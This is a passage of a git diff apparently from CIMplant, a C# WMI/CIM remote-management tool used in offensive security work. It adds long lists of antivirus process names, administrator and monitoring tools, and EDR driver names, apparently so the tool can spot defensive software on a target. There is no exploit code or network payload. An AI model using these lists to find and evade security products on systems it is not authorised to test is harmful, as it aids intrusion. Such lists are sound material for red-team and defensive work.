"inorpc.exe", "inort.exe", "inotask.exe", "intdel.exe", "intren.exe", "iomon98.exe", "isPwdSvc.exe", + "isUAC.exe", "isafe.exe", "isafinst.exe", "issvc.exe", "istsvc.exe", "jammer.exe", "jdbgmrg.exe", "jedi.exe", "kaccore.exe", "kansgui.exe", "kansvr.exe", + "kastray.exe", "kav.exe", "kav32.exe", "kavfs.exe", "kavfsgt.exe", "kavfsrcn.exe", "kavfsscs.exe", "kavfswp.exe", "kavisarv.exe", "kavlite40eng.exe", + "kavlotsingleton.exe", "kavmm.exe", "kavpers40eng.exe", "kavpf.exe", "kavshell.exe", "kavss.exe", "kavstart.exe", "kavsvc.exe", "kavtray.exe", "kazza.exe", + "keenvalue.exe", "kerio-pf-213-en-win.exe", "kerio-wrl-421-en-win.exe", "kerio-wrp-421-en-win.exe", "kernel32.exe", "killprocesssetup161.exe", "kis.exe", + "kislive.exe", "kissvc.exe", "klnacserver.exe", "klnagent.exe", "klserver.exe", "klswd.exe", "klwtblfs.exe", "kmailmon.exe", "knownsvr.exe", "kpf4gui.exe", + "kpf4ss.exe", "kpfw32.exe", "kpfwsvc.exe", "krbcc32s.exe", "kvdetech.exe", "kvolself.exe", "kvsrvxp.exe", "kvsrvxp_1.exe", "kwatch.exe", "kwsprod.exe", + "kxeserv.exe", "launcher.exe", "ldnetmon.exe", "ldpro.exe", "ldpromenu.exe", "ldscan.exe", "leventmgr.exe", "livesrv.exe", "lmon.exe", "lnetinfo.exe", + "loader.exe", "localnet.exe", "lockdown.exe", "lockdown2000.exe", "log_qtine.exe", "lookout.exe", "lordpe.exe", "lsetup.exe", "luall.exe", "luau.exe", + "lucallbackproxy.exe", "lucoms.exe", "lucomserver.exe", "lucoms~1.exe", "luinit.exe", "luspt.exe", "makereport.exe", "mantispm.exe", "mapisvc32.exe", + "masalert.exe", "massrv.exe", "mcafeefire.exe", "mcagent.exe", "mcappins.exe", "mcconsol.exe", "mcdash.exe", "mcdetect.exe", "mcepoc.exe", "mcepocfg.exe", + "mcinfo.exe", "mcmnhdlr.exe", "mcmscsvc.exe", "mcods.exe", "mcpalmcfg.exe", "mcpromgr.exe", "mcregwiz.exe", "mcscript.exe", "mcscript_inuse.exe", "mcshell.exe", + "mcshield.exe", "mcshld9x.exe", "mcsysmon.exe", "mctool.exe", "mctray.exe", "mctskshd.exe", "mcuimgr.exe", "mcupdate.exe", "mcupdmgr.exe", "mcvsftsn.exe", + "mcvsrte.exe", "mcvsshld.exe", "mcwce.exe", "mcwcecfg.exe", "md.exe", "mfeann.exe", "mfevtps.exe", "mfin32.exe", "mfw2en.exe", "mfweng3.02d30.exe", + "mgavrtcl.exe", "mgavrte.exe", "mghtml.exe", "mgui.exe", "minilog.exe", "mmod.exe", "monitor.exe", "monsvcnt.exe", "monsysnt.exe", "moolive.exe", + "mostat.exe", "mpcmdrun.exe", "mpf.exe", "mpfagent.exe", "mpfconsole.exe", "mpfservice.exe", "mpftray.exe", "mps.exe", "mpsevh.exe", "mpsvc.exe", "mrf.exe", + "mrflux.exe", "msapp.exe", "msascui.exe", "msbb.exe", "msblast.exe", "mscache.exe", "msccn32.exe", "mscifapp.exe", "mscman.exe", "msconfig.exe", "msdm.exe", + "msdos.exe", "msiexec16.exe", "mskagent.exe", "mskdetct.exe", "msksrver.exe", "msksrvr.exe", "mslaugh.exe", "msmgt.exe", "msmpeng.exe", "msmsgri32.exe", + "msscli.exe", "msseces.exe", "mssmmc32.exe", "msssrv.exe", "mssys.exe", "msvxd.exe", "mu0311ad.exe", "mwatch.exe", "myagttry.exe", "n32scanw.exe", "nSMDemf.exe", + "nSMDmon.exe", "nSMDreal.exe", "nSMDsch.exe", "naPrdMgr.exe", "nav.exe", "navap.navapsvc.exe", "navapsvc.exe", "navapw32.exe", "navdx.exe", "navlu32.exe", + "navnt.exe", "navstub.exe", "navw32.exe", "navwnt.exe", "nc2000.exe", "ncinst4.exe", "MSASCuiL.exe", "MBAMService.exe", "mbamtray.exe", "CylanceSvc.exe", + "ndd32.exe", "ndetect.exe", "neomonitor.exe", "neotrace.exe", "neowatchlog.exe", "netalertclient.exe", + "netarmor.exe", "netcfg.exe", "netd32.exe", "netinfo.exe", "netmon.exe", "netscanpro.exe", "netspyhunter-1.2.exe", "netstat.exe", "netutils.exe", "networx.exe", + "ngctw32.exe", "ngserver.exe", "nip.exe", "nipsvc.exe", "nisoptui.exe", "nisserv.exe", "nisum.exe", "njeeves.exe", "nlsvc.exe", "nmain.exe", "nod32.exe", + "nod32krn.exe", "nod32kui.exe", "normist.exe", "norton_internet_secu_3.0_407.exe", "notstart.exe", "npf40_tw_98_nt_me_2k.exe", "npfmessenger.exe", + "npfmntor.exe", "npfmsg.exe", "nprotect.exe", "npscheck.exe", "npssvc.exe", "nrmenctb.exe", "nsched32.exe", "nscsrvce.exe", "nsctop.exe", "nsmdtr.exe", + "nssys32.exe", "nstask32.exe", "nsupdate.exe", "nt.exe", "ntcaagent.exe", "ntcadaemon.exe", "ntcaservice.exe", "ntrtscan.exe", "ntvdm.exe", "ntxconfig.exe", + "nui.exe", "nupgrade.exe", "nvarch16.exe", "nvc95.exe", "nvcoas.exe", "nvcsched.exe", "nvsvc32.exe", "nwinst4.exe", "nwservice.exe", "nwtool16.exe", "nymse.exe", + "oasclnt.exe", "oespamtest.exe", "ofcdog.exe", "ofcpfwsvc.exe", "okclient.exe", "olfsnt40.exe", "ollydbg.exe", "onsrvr.exe", "op_viewer.exe", "opscan.exe", + "optimize.exe", "ostronet.exe", "otfix.exe", "outpost.exe", "outpostinstall.exe", "outpostproinstall.exe", "paamsrv.exe", "padmin.exe", "pagent.exe", + "pagentwd.exe", "panixk.exe", "patch.exe", "pavbckpt.exe", "pavcl.exe", "pavfires.exe", "pavfnsvr.exe", "pavjobs.exe", "pavkre.exe", "pavmail.exe", + "pavprot.exe", "pavproxy.exe", "pavprsrv.exe", "pavsched.exe", "pavsrv50.exe", "pavsrv51.exe", "pavsrv52.exe", "pavupg.exe", "pavw.exe", "pccNT.exe", + "pccclient.exe", "pccguide.exe", "pcclient.exe", "pccnt.exe", "pccntmon.exe", "pccntupd.exe", "pccpfw.exe", "pcctlcom.exe", "pccwin98.exe", "pcfwallicon.exe", + "pcip10117_0.exe", "pcscan.exe", "pctsAuxs.exe", "pctsGui.exe", "pctsSvc.exe", "pctsTray.exe", "pdsetup.exe", "pep.exe", "periscope.exe", "persfw.exe", + "perswf.exe", "pf2.exe", "pfwadmin.exe", "pgmonitr.exe", "pingscan.exe", "platin.exe", "pmon.exe", "pnmsrv.exe", "pntiomon.exe", "pop3pack.exe", "pop3trap.exe", + "poproxy.exe", "popscan.exe", "portdetective.exe", "portmonitor.exe", "powerscan.exe", "ppinupdt.exe", "ppmcativedetection.exe", "pptbc.exe", "ppvstop.exe", + "pqibrowser.exe", "pqv2isvc.exe", "prevsrv.exe", "prizesurfer.exe", "prmt.exe", "prmvr.exe", "programauditor.exe", "proport.exe", "protectx.exe", "psctris.exe", + "psh_svc.exe", "psimreal.exe", "psimsvc.exe", "pskmssvc.exe", "pspf.exe", "purge.exe", "pview.exe", "pviewer.exe", "pxemtftp.exe", "pxeservice.exe", + "qclean.exe", "qconsole.exe", "qdcsfs.exe", "qoeloader.exe", "qserver.exe", "rapapp.exe", "rapuisvc.exe", "ras.exe", "rasupd.exe", "rav7.exe", "rav7win.exe", + "rav8win32eng.exe", "ravmon.exe", "ravmond.exe", "ravstub.exe", "ravxp.exe", "ray.exe", "rb32.exe", "rcsvcmon.exe", "rcsync.exe", "realmon.exe", "reged.exe", + "remupd.exe", "reportsvc.exe", "rescue.exe", "rescue32.exe", "rfwmain.exe", "rfwproxy.exe", "rfwsrv.exe", "rfwstub.exe", "rnav.exe", "rrguard.exe", "rshell.exe", + "rsnetsvr.exe", "rstray.exe", "rtvscan.exe", "rtvscn95.exe", "rulaunch.exe", "saHookMain.exe", "safeboxtray.exe", "safeweb.exe", "sahagent.exescan32.exe", + "sav32cli.exe", "save.exe", "savenow.exe", "savroam.exe", "savscan.exe", "savservice.exe", "sbserv.exe", "scam32.exe", "scan32.exe", "scan95.exe", "scanexplicit.exe", + "scanfrm.exe", "scanmailoutlook.exe", "scanpm.exe", "schdsrvc.exe", "schupd.exe", "scrscan.exe", "seestat.exe", "serv95.exe", "setloadorder.exe", + "setup_flowprotector_us.exe", "setupguimngr.exe", "setupvameeval.exe", "sfc.exe", "sgssfw32.exe", "sh.exe", "shellspyinstall.exe", "shn.exe", "showbehind.exe", + "shstat.exe", "siteadv.exe", "smOutlookPack.exe", "smc.exe", "smoutlookpack.exe", "sms.exe", "smsesp.exe", "smss32.exe", "sndmon.exe", "sndsrvc.exe", + "soap.exe", "sofi.exe", "softManager.exe", "spbbcsvc.exe", "spf.exe", "sphinx.exe", "spideragent.exe", "spiderml.exe", "spidernt.exe", "spiderui.exe", + "spntsvc.exe", "spoler.exe", "spoolcv.exe", "spoolsv32.exe", "spyxx.exe", "srexe.exe", "srng.exe", "srvload.exe", "srvmon.exe", "ss3edit.exe", "sschk.exe", + "ssg_4104.exe", "ssgrate.exe", "st2.exe", "stcloader.exe", "stinger.exe", "stopp.exe", "stwatchdog.exe", "supftrl.exe", "support.exe", "supporter5.exe", + "svcGenericHost", "svcharge.exe", "svchostc.exe", "svchosts.exe", "svcntaux.exe", "svdealer.exe", "svframe.exe", "svtray.exe", "swdsvc.exe", "sweep95.exe", + "sweepnet.sweepsrv.sys.swnetsup.exe", "sweepsrv.exe", "swnetsup.exe", "swnxt.exe", "swserver.exe", "symlcsvc.exe", "symproxysvc.exe", "symsport.exe", "symtray.exe", + "symwsc.exe", "sysdoc32.exe", "sysedit.exe", "sysupd.exe", "taskmo.exe", "taumon.exe", "tbmon.exe", "tbscan.exe", "tc.exe", "tca.exe", "tclproc.exe", "tcm.exe", + "tdimon.exe", "tds-3.exe", "tds2-98.exe", "tds2-nt.exe", "teekids.exe", "tfak.exe", "tfak5.exe", "tgbob.exe", "titanin.exe", "titaninxp.exe", "tmas.exe", + "tmlisten.exe", "tmntsrv.exe", "tmpfw.exe", "tmproxy.exe", "tnbutil.exe", "tpsrv.exe", "tracesweeper.exe", "trickler.exe", "trjscan.exe", "trjsetup.exe", + "trojantrap3.exe", "trupd.exe", "tsadbot.exe", "tvmd.exe", "tvtmd.exe", "udaterui.exe", "undoboot.exe", "unvet32.exe", "updat.exe", "updtnv28.exe", "upfile.exe", + "upgrad.exe", "uplive.exe", "urllstck.exe", "usergate.exe", "usrprmpt.exe", "utpost.exe", "v2iconsole.exe", "v3clnsrv.exe", "v3exec.exe", "v3imscn.exe", + "vbcmserv.exe", "vbcons.exe", "vbust.exe", "vbwin9x.exe", "vbwinntw.exe", "vcsetup.exe", "vet32.exe", "vet95.exe", "vetmsg.exe", "vettray.exe", "vfsetup.exe", + "vir-help.exe", "virusmdpersonalfirewall.exe", "vnlan300.exe", "vnpc3000.exe", "vpatch.exe", "vpc32.exe", "vpc42.exe", "vpfw30s.exe", "vprosvc.exe", + "vptray.exe", "vrv.exe", "vrvmail.exe", "vrvmon.exe", "vrvnet.exe", "vscan40.exe", "vscenu6.02d30.exe", "vsched.exe", "vsecomr.exe", "vshwin32.exe", "vsisetup.exe", + "vsmain.exe", "vsmon.exe", "vsserv.exe", "vsstat.exe", "vstskmgr.exe", "vswin9xe.exe", "vswinntse.exe", "vswinperse.exe", "w32dsm89.exe", "w9x.exe", + "watchdog.exe", "webdav.exe", "webproxy.exe", "webscanx.exe", "webtrap.exe", "webtrapnt.exe", "wfindv32.exe", "wfxctl32.exe", "wfxmod32.exe", "wfxsnt40.exe", + "whoswatchingme.exe", "wimmun32.exe", "win-bugsfix.exe", "winactive.exe", "winmain.exe", "winnet.exe", "winppr32.exe", "winrecon.exe", "winroute.exe", "winservn.exe", + "winssk32.exe", "winstart.exe", "winstart001.exe", "wintsk32.exe", "winupdate.exe", "wkufind.exe", "wnad.exe", "wnt.exe", "wradmin.exe", "wrctrl.exe", + "wsbgate.exe", "wssfcmai.exe", "wupdater.exe", "wupdt.exe", "wyvernworksfirewall.exe", "xagt.exe", "xagtnotif.exe", "xcommsvr.exe", "xfilter.exe", "xpf202en.exe", + "zanda.exe", "zapro.exe", "zapsetup3001.exe", "zatutor.exe", "zhudongfangyu.exe", "zlclient.exe", "zlh.exe", "zonalm2601.exe", "zonealarm.exe", "cb.exe", + "MsMpEng.exe", "MsSense.exe", "CSFalconService.exe", "CSFalconContainer.exe", "redcloak.exe", "OmniAgent.exe","CrAmTray.exe","AmSvc.exe","minionhost.exe", + "PylumLoader.exe","CrsSvc.exe"}; + + public static readonly string[] Admin = { "MobaXterm.exe", "bash.exe", "git-bash.exe", "mmc.exe", "Code.exe", "notepad++.exe", "notepad.exe", "cmd.exe", + "drwatson.exe", "DRWTSN32.EXE", "drwtsn32.exe", "dumpcap.exe", "ethereal.exe", "filemon.exe", "idag.exe", "idaw.exe", "k1205.exe", "loader32.exe", + "netmon.exe", "netstat.exe", "netxray.exe", "NmWebService.exe", "nukenabber.exe", "portmon.exe", "powershell.exe", "PRTG Traffic Gr.exe", + "PRTG Traffic Grapher.exe", "prtgwatchdog.exe", "putty.exe", "regmon.exe", "SystemEye.exe", "taskman.exe", "TASKMGR.EXE", "tcpview.exe", "Totalcmd.exe", + "TrafMonitor.exe", "windbg.exe", "winobj.exe", "wireshark.exe", "WMonAvNScan.exe", "WMonAvScan.exe", "WMonSrv.exe","regedit.exe", "regedit32.exe", + "accesschk.exe", "accesschk64.exe", "AccessEnum.exe", "ADExplorer.exe", "ADInsight.exe", "adrestore.exe", "Autologon.exe", "Autoruns.exe", "Autoruns64.exe", + "autorunsc.exe", "autorunsc64.exe", "Bginfo.exe", "Bginfo64.exe", "Cacheset.exe", "Clockres.exe", "Clockres64.exe", "Contig.exe", "Contig64.exe", + "Coreinfo.exe", "ctrl2cap.exe", "Dbgview.exe", "Desktops.exe", "disk2vhd.exe", "diskext.exe", "diskext64.exe", "Diskmon.exe", "DiskView.exe", "du.exe", + "du64.exe", "efsdump.exe", "FindLinks.exe", "FindLinks64.exe", "handle.exe", "handle64.exe", "hex2dec.exe", "hex2dec64.exe", "junction.exe", "junction64.exe", + "ldmdump.exe", "Listdlls.exe", "Listdlls64.exe", "livekd.exe", "livekd64.exe", "LoadOrd.exe", "LoadOrd64.exe", "LoadOrdC.exe", "LoadOrdC64.exe", + "logonsessions.exe", "logonsessions64.exe", "movefile.exe", "movefile64.exe", "notmyfault.exe", "notmyfault64.exe", "notmyfaultc.exe", "notmyfaultc64.exe", + "ntfsinfo.exe", "ntfsinfo64.exe", "pagedfrg.exe", "pendmoves.exe", "pendmoves64.exe", "pipelist.exe", "pipelist64.exe", "portmon.exe", "procdump.exe", + "procdump64.exe", "procexp.exe", "procexp64.exe", "Procmon.exe", "PsExec.exe", "PsExec64.exe", "psfile.exe", "psfile64.exe", "PsGetsid.exe", "PsGetsid64.exe", + "PsInfo.exe", "PsInfo64.exe", "pskill.exe", "pskill64.exe", "pslist.exe", "pslist64.exe", "PsLoggedon.exe", "PsLoggedon64.exe", "psloglist.exe", "pspasswd.exe", + "pspasswd64.exe", "psping.exe", "psping64.exe", "PsService.exe", "PsService64.exe", "psshutdown.exe", "pssuspend.exe", "pssuspend64.exe", "RAMMap.exe", + "RegDelNull.exe", "RegDelNull64.exe", "regjump.exe", "ru.exe", "ru64.exe", "sdelete.exe", "sdelete64.exe", "ShareEnum.exe", "ShellRunas.exe", "sigcheck.exe", + "sigcheck64.exe", "streams.exe", "streams64.exe", "strings.exe", "strings64.exe", "sync.exe", "sync64.exe", "Sysmon.exe", "Sysmon64.exe", "Tcpvcon.exe", + "Tcpview.exe", "Testlimit.exe", "Testlimit64.exe", "vmmap.exe", "Volumeid.exe", "Volumeid64.exe", "whois.exe", "whois64.exe", "Winobj.exe", "ZoomIt.exe", + "KeePass.exe", "1Password.exe", "lastpass.exe"}; + + // Thanks Harley! + // https://github.com/harleyQu1nn/AggressorScripts/blob/master/EDR.cna + public static readonly string[] Edr = {"CiscoAMPCEFWDriver.sys", "CiscoAMPHeurDriver.sys", "cbstream.sys", "cbk7.sys", "Parity.sys", "libwamf.sys", + "LRAgentMF.sys", "BrCow_x_x_x_x.sys", "brfilter.sys", "BDSandBox.sys", "TRUFOS.SYS", "AVC3.SYS", "Atc.sys", "AVCKF.SYS", "bddevflt.sys", "gzflt.sys", + "bdsvm.sys", "hbflt.sys", "cve.sys", "psepfilter.sys", "cposfw.sys", "dsfa.sys", "medlpflt.sys", "epregflt.sys", "TmFileEncDmk.sys", "tmevtmgr.sys", + "TmEsFlt.sys", "fileflt.sys", "SakMFile.sys", "SakFile.sys", "AcDriver.sys", "TMUMH.sys", "hfileflt.sys", "TMUMS.sys", "MfeEEFF.sys", "mfprom.sys", + "hdlpflt.sys", "swin.sys", "mfehidk.sys", "mfencoas.sys", "epdrv.sys", "carbonblackk.sys", "csacentr.sys", "csaenh.sys", "csareg.sys", "csascr.sys", + "csaav.sys", "csaam.sys", "esensor.sys", "fsgk.sys", "fsatp.sys", "fshs.sys", "eaw.sys", "im.sys", "csagent.sys", "rvsavd.sys", "dgdmk.sys", "atrsdfw.sys", + "mbamwatchdog.sys", "edevmon.sys", "SentinelMonitor.sys", "edrsensor.sys", "ehdrv.sys", "HexisFSMonitor.sys", "CyOptics.sys", "CarbonBlackK.sys", + "CyProtectDrv32.sys", "CyProtectDrv64.sys", "CRExecPrev.sys", "ssfmonm.sys", "CybKernelTracker.sys", "SAVOnAccess.sys", "savonaccess.sys", "sld.sys", + "aswSP.sys", "FeKern.sys", "klifks.sys", "klifaa.sys", "Klifsm.sys", "mfeaskm.sys", "mfencfilter.sys", "WFP_MRT.sys", "groundling32.sys", "SAFE-Agent.sys", + "groundling64.sys", "avgtpx86.sys", "avgtpx64.sys", "pgpwdefs.sys", "GEProtection.sys", "diflt.sys", "sysMon.sys", "ssrfsf.sys", "emxdrv2.sys", "reghook.sys", + "spbbcdrv.sys", "bhdrvx86.sys", "bhdrvx64.sys", "SISIPSFileFilter.sys", "symevent.sys", "VirtualAgent.sys", "vxfsrep.sys", "VirtFile.sys", "SymAFR.sys", + "symefasi.sys", "symefa.sys", "symefa64.sys", "SymHsm.sys", "evmf.sys", "GEFCMP.sys", "VFSEnc.sys", "pgpfs.sys", "fencry.sys", "symrg.sys", "cfrmd.sys", + "cmdccav.sys", "cmdguard.sys", "CmdMnEfs.sys", "MyDLPMF.sys", "PSINPROC.SYS", "PSINFILE.SYS", "amfsm.sys", "amm8660.sys", "amm6460.sys"}; + } } \ No newline at end of file diff --git a/CIMplant/Planter.cs b/CIMplant/Planter.cs old mode 100755 new mode 100644 diff --git a/CIMplant/Program.cs b/CIMplant/Program.cs old mode 100755 new mode 100644 index 16ceeb6..8399d24 --- a/CIMplant/Program.cs +++ b/CIMplant/Program.cs @@ -198,6 +198,11 @@ private static void Main(string[] args) { planter.Connector = new Connector(options.Wmi, planter); + if (!options.Wmi) //using CIM + { + + } + // We can use && since one will always start as null if (planter.Connector.ConnectedCimSession == null && planter.Connector.ConnectedWmiSession == null) {